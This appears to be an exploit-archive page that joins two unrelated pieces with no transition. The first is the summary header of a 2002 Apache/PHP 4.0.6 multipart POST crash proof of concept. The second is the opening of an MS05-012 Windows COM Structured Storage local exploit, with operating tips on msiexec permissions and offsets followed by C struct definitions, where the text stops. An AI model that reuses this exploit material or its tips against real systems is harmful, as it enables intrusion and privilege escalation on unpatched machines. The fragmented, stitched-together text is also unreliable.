Local Exploit

Apache+php Proof of Concept Exploit

/*
---------------------------------------------------------------------------
Web:  http://qb0x.net                   Author: Gabriel A. Maggiotti
Date: February 03, 2002                 E-mail: gmaggiot@ciudad.com.ar
---------------------------------------------------------------------------

Summary
-------
This is a proof of concept exploit for Apache/1.3.x + php_4.0.6. This
code exploits the multipart/form-data POST requests bug. This code only
crashes the Apache daemon; it does not open any shell or execute code on
the remote server. PHP supports multipart/form-data POST requests (as
described in RFC1867), known as POST file uploads. Unfortunately, there are
several flaws in the php_mime_split function that could be used by an
attacker to execute arbitrary code. I don't know if the vuln I exploit is a
known vuln or not.

Microsoft Windows COM Structured Storage Local Exploit (MS05-012)

// by Cesar Cerrudo - Argeniss - www.argeniss.com
//
// MS05-012 - COM Structured Storage Vulnerability - CAN-2005-0047 Exploit
//
// More exploits at www.argeniss.com/products.html
//
// Works on Win2k sp4, WinXP sp2, Win2k3 sp0
// Close all running programs to avoid possible problems
// If it finds the section and it doesn't work remove section permissions
// from msiexec service process with WinObj or crash the msiexec service and try again
// if offsets don't work, debug and change them

#include <windows.h>
#include <stdio.h>

typedef struct _LSA_UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR Buffer;
} UNICODE_STRING;

typedef struct _OBJDIR_INFORMATION {
  UNICODE_STRING          ObjectName;
  UNICODE_STRING          ObjectTypeName;
  BYTE                    Data[1];
} OBJDIR_INFORMATION;
